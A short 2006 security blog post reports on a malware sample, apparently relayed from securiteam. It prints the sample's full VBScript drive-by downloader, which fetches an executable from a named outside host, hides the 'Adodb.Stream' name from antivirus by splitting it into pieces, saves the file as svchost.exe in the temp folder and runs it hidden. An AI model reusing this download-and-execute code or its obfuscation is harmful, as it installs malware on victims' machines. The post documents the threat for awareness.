Malware 2.0: Malware utilizes AJAX to install itself
By ArnY on Thursday 23 November 2006, 11:27 - security - Permalink
Well, ok, it's not really AJAX. This malware uses an HTML bit using XMLHttpRequest to fetch and download the actual executable. Add some minor obfuscation to fool antiviruses and you get W32/new-malware!Maximus on your harddrive:
[title][/title]
[head][/head]
[body]
[script language=”VBScript”]
on error resume next
‘ due to how ajax works, the file MUST be within the same local domain
dl = “http://grupo-arroba.by.ru/grupo.exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”")
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,”")
S.type = 1
‘ xml ajax req
str6=”GET”
x.Open str6, dl, False
x.Send
‘ Get temp directory and create our destination name
fname1=”svchost.exe”
set F = df.createobject(”Scripting.FileSystemObject”,”")
set tmp = F.GetSpecialFolder(2) ‘ Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
‘ open adodb stream and write contents of request to file
‘ like vbs dl+exec code
S.write x.responseBody
‘ Saves it with CreateOverwrite flag
S.savetofile fname1,2
set Q = df.createobject(”Shell.Application”,”")
Q.ShellExecute fname1,”",”",”open”,0
[/script]
[head]
[title][BL4CK] || 404 Not Found[/title]
[/head][body]
[center][embed xsrc=”" pluginspage=”" type=”application/x-shockwave-flash” width=”550″ height=”290″] [/embed]
[!– [script]location.href=’http://google.com’[/script] –]
[/body]
[/html]
via securiteam